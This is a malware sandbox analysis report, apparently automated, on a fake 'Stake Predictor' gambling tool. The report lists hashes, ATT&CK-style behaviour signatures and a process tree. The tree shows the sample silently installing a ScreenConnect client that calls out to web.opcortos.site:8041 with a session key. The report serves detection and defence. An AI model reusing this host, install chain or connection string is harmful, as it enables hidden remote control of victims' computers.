Analysis

  • max time kernel
    92s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
  • submitted
    20/11/2024, 03:52

General

  • Target

    Stake Predictor V 6.5/data/x64.exe

  • Size

    5.4MB

  • MD5

    04b62df7bc57f5f089d2b7da540f1cd4

  • SHA1

    585f45877c422b8172c2b8acb5c2e99e2b9e71e0

  • SHA256

    937489b1fb9ec5d89ec2515603e629dd3d0afca7b3042d6d2b748ddb31582f73

  • SHA512

    164dbc64230f7f2824ab16ebab10ce36bfbd798493884b612186f072fae57b30c3983188caff3118e7a6224cabba1d8091edcf19b21c295aac1a9e2d934e9c65

  • SSDEEP

    98304:tas6efPFqDexXV1lknvGDm/0yxQQ8zCAvvPIQG:IfefPFNXDkimcyRjA

Malware Config

Signatures

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

    Suspicious Windows Authentication Registry Modification.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 3 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Drops file in Program Files directory 17 IoCs
  • Drops file in Windows directory 13 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 22 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 37 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Stake Predictor V 6.5\data\x64.exe
    "C:\Users\Admin\AppData\Local\Temp\Stake Predictor V 6.5\data\x64.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2168
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.6.9056\3a4594764213d345\ScreenConnect.ClientSetup.msi"
      2⤵
      • Enumerates connected drives
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:2316
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Boot or Logon Autostart Execution: Authentication Package
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3440
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 30E6364F26DC128D7E2DA74AD2BA8F06 C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4832
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI8A8D.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240618234 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:1180
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      PID:4852
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 33E42201A008A303A1A700FAEA7279AB
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:2008
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 170E080938C3C878A8A4B54E77A630D2 E Global\MSI0000
      2⤵
      • Drops file in Windows directory
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:3616
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    PID:2528
  • C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\ScreenConnect.ClientService.exe
    "C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=web.opcortos.site&p=8041&s=14e15d71-e436-435b-9198-d25c3622d2db&k=BgIAAACkAABSU0ExAAgAAAEAAQAtKNB5tpHnGBbFtYd9fkfV2WUqUQKKmkZmbMjL8aKUACJuhQ8STY08Xf%2bOJx7SJ7RwXLAvhPqyzVjP1CSvZS%2frjLfXD5nrfVqZtGMjASTw%2biE901OStQsrrIfJ5D0L8P1V7w%2f4LHwUtjjrLVXdErXroZkAxmZiK2qvprJ%2f5GKGTniKrQGtBXA8u7ZB0wKk00k9aua2YntrIGl%2b9lnsMx62%2b80B9WWngJSC3kdtAuXXJKiL4xMkgsGgbS553qbbC7AeaR%2bMprbBtBGfTKHjDdDqJU1uRMdn0FIwefRdLN1ZcOof4t37KWYetrpXX4egVMmTn3c2i%2bWMrg3dsBX57%2f%2fD&c=HMOTYIZ&c=&c=&c=&c=&c=&c=&c="
    1⤵
    • Sets service image path in registry
    • Drops file in System32 directory
    • Executes dropped EXE
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4060
    • C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\ScreenConnect.WindowsClient.exe
      "C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\ScreenConnect.WindowsClient.exe" "RunRole" "646ebb2c-61f9-4643-9d54-5dacef6311ea" "User"
      2⤵
      • Executes dropped EXE
      PID:3340
    • C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\ScreenConnect.WindowsClient.exe
      "C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\ScreenConnect.WindowsClient.exe" "RunRole" "92d35810-ea11-479f-b791-dbbd9a6ce52e" "System"
      2⤵
      • Drops file in System32 directory
      • Executes dropped EXE
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      PID:2292

Network

MITRE ATT&CK Enterprise v15

Downloads
